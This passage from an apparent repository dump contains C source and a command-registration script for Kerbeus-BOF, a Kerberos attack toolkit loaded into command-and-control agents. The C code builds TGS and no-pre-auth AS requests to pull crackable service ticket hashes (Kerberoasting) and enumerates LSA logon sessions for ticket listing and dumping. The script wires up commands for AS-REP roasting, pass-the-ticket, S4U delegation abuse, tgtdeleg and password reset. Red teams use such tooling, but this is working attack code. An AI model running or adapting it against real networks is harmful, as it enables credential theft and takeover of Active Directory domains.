    if (AsnToBytesEncode(&reqAsn, reqBytesSize, reqBytes)) return TRUE;

    return FALSE;
}

BOOL TGS(char* userName, char* domain, Ticket providedTicket, EncryptionKey clientKey, char* service, int requestEType, char* domainController, byte* tgs, BOOL opsec, BOOL ptt, BOOL u2u, char* targetDomain, char* targetUser, BOOL display, BOOL keyList, byte** retTgsBytes, int* retTgsBytesLength /*BOOL roast = FALSE, string asrepkey = "" */) {

    PRINT_OUT("\n[*] Building TGS - REQ request for: '%s'\n", service);

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_REQ(userName, domain, service, providedTicket, clientKey, requestEType, tgs, opsec, u2u, FALSE, targetDomain, targetUser, keyList, FALSE, &tgsBytes, &tgsBytesLength)) return TRUE;

    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(domainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
//        if (display)
            PRINT_OUT("[+] TGS request successful!\n");

        // parse the response to an TGS-REP
        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode(outBytes, outBytesLength, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        EncryptionKey keyListHash = { 0 };
        // build the final KRB-CRED structure
        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;
        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        *retTgsBytes = kirbiBytes;
        *retTgsBytesLength = kirbiBytesSize;
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
//        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

BOOL NewAS_REQ( char* pcUsername, char* pcDomain, EncryptionKey encKey, BOOL opsec, BOOL bPac, BOOL is_nopreauth, char* service, AS_REQ* as_req ) {
    as_req->pvno = 5;
    as_req->msg_type = KERB_AS_REQ;

    as_req->req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    as_req->req_body.till = 1 * 3600;   // valid for 1h
    ADVAPI32$SystemFunction036(&(as_req->req_body.nonce), 4);
    if (my_copybuf(&as_req->req_body.realm, pcDomain, my_strlen(pcDomain) + 1)) return TRUE;

    as_req->req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    as_req->req_body.cname.name_count = 1;
    as_req->req_body.cname.name_string = MemAlloc(sizeof(void*) * as_req->req_body.cname.name_count);
    if (!as_req->req_body.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(as_req->req_body.cname.name_string[0]), pcUsername, my_strlen(pcUsername) + 1)) return TRUE;

    int partsCount = 1;
    int index = 0;
    while (service[index]) {
        if (service[index] == '/')
            partsCount++;
        index++;
    }

    as_req->req_body.sname.name_count  = partsCount;
    as_req->req_body.sname.name_string = MemAlloc(sizeof(void*) * as_req->req_body.cname.name_count);
    as_req->req_body.sname.name_type   = PRINCIPAL_NT_PRINCIPAL;

    int partIndex = 0;
    int startIndex = 0;
    index = 0;
    while (service[index] && partIndex < partsCount) {
        if (service[index] == '/') {
            if (my_copybuf(&(as_req->req_body.sname.name_string[partIndex]), service + startIndex, index + 1 - startIndex)) return TRUE;
            as_req->req_body.sname.name_string[partIndex][index] = 0;
            startIndex = index + 1;
            partIndex++;
        }
        index++;
    }
    if (my_copybuf(&(as_req->req_body.sname.name_string[partIndex]), service + startIndex, index + 1 - startIndex)) return TRUE;

    as_req->pa_data_count = 1;
    as_req->pa_data = MemAlloc(sizeof(PA_DATA) * as_req->pa_data_count);
    if (!as_req->pa_data) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }

    as_req->pa_data[0].type  = PADATA_PA_PAC_REQUEST;
    as_req->pa_data[0].value = MemAlloc(sizeof(KERB_PA_PAC_REQUEST));
    if (!as_req->pa_data[0].value) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ((KERB_PA_PAC_REQUEST*)as_req->pa_data[0].value)->include_pac = bPac;

    as_req->req_body.etypes_count = 1;
    as_req->req_body.etypes = MemAlloc(sizeof(int) * as_req->req_body.etypes_count);
    if (!as_req->req_body.etypes) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    as_req->req_body.etypes[0] = encKey.key_type;

    return FALSE;
}

BOOL GetTGSRepHash(char* ticket, char* spn, char* userName, char* domainController, int requestEType) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket, &bytesSize);

    KRB_CRED TGT = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, FALSE, &asn_KRB_CRED)) return TRUE;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &TGT)) return TRUE;

    char* tgtDomain = NULL;
    char* serviceName = TGT.tickets[0].sname.name_string[0];

    if (TGT.tickets[0].sname.name_count > 1 && my_strcmp(serviceName, "krbtgt") != 0) {
        PRINT_OUT("[X] Unable to request service tickets without a TGT, please rerun and provide a TGT to '/ticket'.\n");
        return FALSE;
    }
    else {
        tgtDomain = TGT.tickets[0].sname.name_string[1];
    }

    char* tgtUserName = TGT.enc_part.ticket_info[0].pname.name_string[0];
    char* domain = TGT.enc_part.ticket_info[0].prealm;
    StrToLower(domain);
    Ticket tr_ticket = TGT.tickets[0];
    EncryptionKey clientKey = TGT.enc_part.ticket_info[0].key;

    byte* tgsBytes = NULL;
    int tgsBytesLength = 0;
    if (TGS(tgtUserName, domain, tr_ticket, clientKey, spn, requestEType, domainController, NULL, FALSE, FALSE, FALSE, tgtDomain, NULL, FALSE, FALSE, &tgsBytes, &tgsBytesLength)) return TRUE;

    if (tgsBytes) {
        KRB_CRED tgsKirbi = { 0 };
        AsnElt   asn_tgsKirbi = { 0 };
        if (BytesToAsnDecode(tgsBytes, tgsBytesLength, &asn_tgsKirbi)) return TRUE;
        if (AsnGetKrbCred(&(asn_tgsKirbi.sub[0]), &tgsKirbi)) return TRUE;

        DisplayTGShash(tgsKirbi, TRUE, userName, tgtDomain);
        return FALSE;
    }
    return TRUE;
}

BOOL GetTGSRepHash_nopreauth(char* nopreauth, char* spn, char* userName, char* domainController, char* domain, int requestEType) {
    EncryptionKey encKey = { 0 };
    encKey.key_type = requestEType;

    AS_REQ NoPreAuthASREQ = { 0 };
    if (NewAS_REQ(nopreauth, domain, encKey, FALSE, TRUE, TRUE, spn, &NoPreAuthASREQ)) return TRUE;

    AsnElt requestAsn = { 0 };
    if (ReqToAsnEncode(NoPreAuthASREQ, 10, &requestAsn)) return TRUE;

    int bRequestAsnSize = 0;
    byte* bRequestAsn = 0;
    if (AsnToBytesEncode(&requestAsn, &bRequestAsnSize, &bRequestAsn)) return TRUE;

    byte* response = NULL;
    int responseSize = 0;
    sendBytes(domainController, "88", bRequestAsn, bRequestAsnSize, &response, &responseSize);

    if (responseSize == 0)
        return TRUE;

    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_AS_REP) {

        AS_REP rep = { 0 };
        if (NewAS_REP(responseAsn, &rep)) return TRUE;

        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;

        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };
        if (my_copybuf(&(info.prealm), domain, my_strlen(domain) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        if (my_copybuf(&(info.srealm), domain, my_strlen(domain) + 1)) return TRUE;

        info.sname = NoPreAuthASREQ.req_body.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), NoPreAuthASREQ.req_body.sname.name_string[i], my_strlen(NoPreAuthASREQ.req_body.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        DisplayTGShash(cred, TRUE, userName, domain);
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        if (error_code == 0x19) { // KDC_ERR_PREAUTH_REQUIRED
            PRINT_OUT("[!] Pre-Authentication required!\n");
        }
    }
    else {
        return TRUE;
    }
    return FALSE;
}

void Kerberoast(char* spn, char* domain, char* dc, char* TGT, char* nopreauth) {
    PRINT_OUT("[*] Target SPN: %s\n", spn);

    if (nopreauth) {
        PRINT_OUT("[*] Using %s without pre-auth to request service tickets\n", nopreauth);
        GetTGSRepHash_nopreauth(nopreauth, spn, spn, dc, domain, rc4_hmac);
    }
    else {
        PRINT_OUT("[*] Using a TGT /ticket to request service tickets\n");
        GetTGSRepHash(TGT, spn, "USER", dc, rc4_hmac);
    }
}

void KERBEROAST_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: Kerberoasting\n");

    char* spn          = NULL;
    char* ticket       = NULL;
    char* dc           = NULL;
    char* domain       = NULL;
    char* nopreauth    = NULL;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc);
        i += GetStrParam(Buffer + i, Length - i, "/spn:", 5, &spn);
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain);
        i += GetStrParam(Buffer + i, Length - i, "/ticket:", 8, &ticket);
        i += GetStrParam(Buffer + i, Length - i, "/nopreauth:", 11, &nopreauth);
    }

    GetDomainInfo(&domain, &dc);
    if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (spn == NULL) {
        PRINT_OUT("\n[X] You must supply a SPN!\n\n");
        return;
    }

    if ( nopreauth == NULL && ticket == NULL ) {
        PRINT_OUT("\n[X] You must supply /nopreauth, /ticket or /credUser !\n\n");
        return;
    }

    Kerberoast(spn, domain, dc, ticket, nopreauth);
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        KERBEROAST_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}

================================================
FILE: AD-BOF/Kerbeus-BOF/kerbeus.axs
================================================
var metadata = {
    name: "Kerbeus-BOF",
    description: "Kerberos Exploitation BOFs"
};

let _cmd_asreproasting = ax.create_command("asreproasting", "Perform AS-REP roasting", "kerbeus asreproasting /user:pre_user");
_cmd_asreproasting.addArgString("params", true, "Args: /user:USER [/dc:DC] [/domain:DOMAIN]");
_cmd_asreproasting.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/asreproasting." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus ASREPROASTING");
});

let _cmd_asktgt = ax.create_command("asktgt", "Retrieve a TGT", "kerbeus asktgt /user:Admin /password:QWErty /enctype:aes256 /opsec /ptt");
_cmd_asktgt.addArgString("params", true, "Args: /user:USER /password:PASSWORD [/domain:DOMAIN] [/dc:DC] [/enctype:(rc4|aes256)] [/service:SPN] [/ptt] [/nopac] [/opsec]\n                              /user:USER /aes256:HASH [/domain:DOMAIN] [/dc:DC] [/service:SPN] [/ptt] [/nopac] [/opsec]\n                              /user:USER /rc4:HASH [/domain:DOMAIN] [/dc:DC] [/service:SPN] [/ptt] [/nopac]\n                              /user:USER /nopreauth [/domain:DOMAIN] [/dc:DC]");
_cmd_asktgt.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/asktgt." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus ASKTGT");
});

let _cmd_asktgs = ax.create_command("asktgs", "Retrieve a TGS", "kerbeus asktgs /service:CIFS/dc.domain.local /ticket:doIF8DCCBey... /opsec");
_cmd_asktgs.addArgString("params", true, "Args: /ticket:BASE64 /service:SPN1,SPN2,... [/domain:DOMAIN] [/dc:DC] [/tgs:BASE64] [/targetdomain:DOMAIN] [/targetuser:USER] [/enctype:(rc4|aes256)] [/ptt] [/keylist] [/u2u] [/opsec] [/enterprise] [/dmsa]");
_cmd_asktgs.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/asktgs." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus ASKTGS");
});

let _cmd_changepw = ax.create_command("changepw", "Reset a user's password from a supplied TGT", "kerbeus changepw /new:New_P4ss /ticket:doIF8DCCBey...");
_cmd_changepw.addArgString("params", true, "Args: /ticket:BASE64 /new:PASSWORD [/dc:DC] [/targetuser:USER] [/targetdomain:DOMAIN]");
_cmd_changepw.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/changepw." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus CHANGEPW");
});

let _cmd_describe = ax.create_command("describe", "Parse and describe a ticket", "kerbeus describe /ticket:doIF8DCCBey...");
_cmd_describe.addArgString("params", true, "Args: /ticket:BASE64");
_cmd_describe.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/describe." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus DESCRIBE");
});

let _cmd_dump = ax.create_command("dump", "Dump tickets", "kerbeus dump");
_cmd_dump.addArgString("params", "Args: [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]", "");
_cmd_dump.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/dump." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus DUMP");
});

let _cmd_hash = ax.create_command("hash", "Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1 hashes", "kerbeus hash /password:!Q@W3e4r");
_cmd_hash.addArgString("params", true, "Args: /password:PASSWORD [/user:USER] [/domain:DOMAIN]");
_cmd_hash.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/hash." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus HASH");
});

let _cmd_kerberoasting = ax.create_command("kerberoasting", "Perform Kerberoasting", "kerbeus kerberoasting /spn:CIFS/COMP.domain.local /ticket:doIF8DCCBey...");
_cmd_kerberoasting.addArgString("params", true, "Args: /spn:SPN [/nopreauth:USER] [/dc:DC] [/domain:DOMAIN]\n                              /spn:SPN /ticket:BASE64 [/dc:DC]");
_cmd_kerberoasting.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/kerberoasting." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus KERBEROASTING");
});

let _cmd_klist = ax.create_command("klist", "List tickets", "kerbeus klist /luid:3ea8");
_cmd_klist.addArgString("params", "Args: [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]", "");
_cmd_klist.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/klist." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus KLIST");
});

let _cmd_ptt = ax.create_command("ptt", "Submit a TGT", "kerbeus ptt /ticket:doIF8DCCBey...");
_cmd_ptt.addArgString("params", true, "Args: /ticket:BASE64 [/luid:LOGONID]");
_cmd_ptt.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/ptt." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus PTT");
});

let _cmd_purge = ax.create_command("purge", "Purge tickets", "kerbeus purge /luid:3ea8");
_cmd_purge.addArgString("params", "Args: [/luid:LOGONID]", "");
_cmd_purge.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/purge." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus PURGE");
});

let _cmd_renew = ax.create_command("renew", "Renew a TGT", "kerbeus renew /ticket:doIF8DCCBey...");
_cmd_renew.addArgString("params", true, "Args: /ticket:BASE64 [/dc:DC] [/ptt]");
_cmd_renew.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/renew." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus RENEW");
});

let _cmd_s4u = ax.create_command("s4u", "Perform S4U constrained delegation abuse", "kerbeus s4u /ticket:doIF8DCCBey... /impersonateuser:Administrator /service:host/comp.domain.local /altservice:http,cifs");
_cmd_s4u.addArgString("params", true, "Args: /ticket:BASE64 /service:SPN {/impersonateuser:USER | /tgs:BASE64} [/domain:DOMAIN] [/dc:DC] [/altservice:SERVICE] [/ptt] [/nopac] [/opsec] [/self]");
_cmd_s4u.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/s4u." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus S4U");
});

let _cmd_cross_s4u = ax.create_command("cross_s4u", "Perform S4U constrained delegation abuse across domains", "kerbeus cross_s4u /ticket:doIF8DCCBey... /impersonateuser:Administrator /targetdomain:sdomain.local /targetdc:dc.sdomain.local /service:host/comp.sdomain.local /altservice:http,cifs");
_cmd_cross_s4u.addArgString("params", true, "Args: krb_cross_s4u /ticket:BASE64 /service:SPN /targetdomain:DOMAIN /targetdc:DC {/impersonateuser:USER | /tgs:BASE64} [/domain:DOMAIN] [/dc:DC] [/altservice:SERVICE] [/nopac] [/self]");
_cmd_cross_s4u.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/cross_s4u." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus CROSS_S4U");
});

let _cmd_tgtdeleg = ax.create_command("tgtdeleg", "Retrieve a usable TGT for the current user without elevation by abusing the Kerberos GSS-API", "kerbeus tgtdeleg");
_cmd_tgtdeleg.addArgString("params", "Args: [/target:SPN]", "");
_cmd_tgtdeleg.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/tgtdeleg." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus TGTDELEG");
});

let _cmd_triage = ax.create_command("triage", "List tickets in table format", "kerbeus triage /luid:3ea8");
_cmd_triage.addArgString("params", "Args: [/luid:LOGINID] [/user:USER] [/service:SERVICE] [/client:CLIENT]", "");
_cmd_triage.setPreHook(function (id, cmdline, parsed_json, ...parsed_lines)  {
    let params = parsed_json["params"];

    let bof_params = ax.bof_pack("cstr", [params]);
    let bof_path = ax.script_dir() + "_bin/Kerbeus-BOF/triage." + ax.arch(id) + ".o";

    ax.execute_alias(id, cmdline, `execute bof "${bof_path}" ${bof_params}`, "Task: Kerbeus TRIAGE");
});

var cmd_kerbeus = ax.create_command("kerbeus", "Kerberos abuse (kerbeus BOF)");
cmd_kerbeus.addSubCommands([_cmd_asreproasting, _cmd_asktgt, _cmd_asktgs, _cmd_changepw, _cmd_dump, _cmd_hash, _cmd_kerberoasting, _cmd_klist, _cmd_ptt, _cmd_describe, _cmd_purge, _cmd_renew, _cmd_s4u, _cmd_cross_s4u, _cmd_tgtdeleg, _cmd_triage]);

var group_kerbeus = ax.create_commands_group("Kerbeus-BOF", [cmd_kerbeus]);
ax.register_commands_group(group_kerbeus, ["beacon", "gopher", "kharon"], ["windows"], []);

================================================
FILE: AD-BOF/Kerbeus-BOF/klist/klist.c
================================================
#include "_include/functions.c"

SYSTEMTIME ConvertToSystemtime(LARGE_INTEGER li) {
    FILETIME ft;
    SYSTEMTIME st_utc;
    ft.dwHighDateTime = li.HighPart;
    ft.dwLowDateTime = li.LowPart;
    KERNEL32$FileTimeToSystemTime(&ft, &st_utc);
    return st_utc;
}

HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = true;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

BOOL GetLogonSessionData(LUID luid, LOGON_SESSION_DATA* data) {
    LOGON_SESSION_DATA           sessionData = { 0 };
    SECURITY_LOGON_SESSION_DATA* logonData = NULL;
    if (luid.LowPart != 0) {
        if (SECUR32$LsaGetLogonSessionData(&luid, &logonData)) return true;
        sessionData.sessionData = MemAlloc(sizeof(*sessionData.sessionData));
        sessionData.sessionCount = 1;
        sessionData.sessionData[0] = logonData;
        *data = sessionData;
    }
    else {
        ULONG logonSessionCount;
        PLUID logonSessionList;
        if (SECUR32$LsaEnumerateLogonSessions(&logonSessionCount, &logonSessionList)) return true;

        sessionData.sessionData = MemAlloc(logonSessionCount * sizeof(*sessionData.sessionData));
        sessionData.sessionCount = logonSessionCount;
        for (int i = 0; i < logonSessionCount; i++) {
            LUID luid = logonSessionList[i];

            if (SECUR32$LsaGetLogonSessionData(&luid, &logonData))
                sessionData.sessionData[i] = NULL;
            else
                sessionData.sessionData[i] = logonData;
        }
        SECUR32$LsaFreeReturnBuffer(logonSessionList);
        *data = sessionData;
    }
    return false;
}

#ifdef DUMP
char* base64_encode(byte* input, size_t input_len) {
    char base64_chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
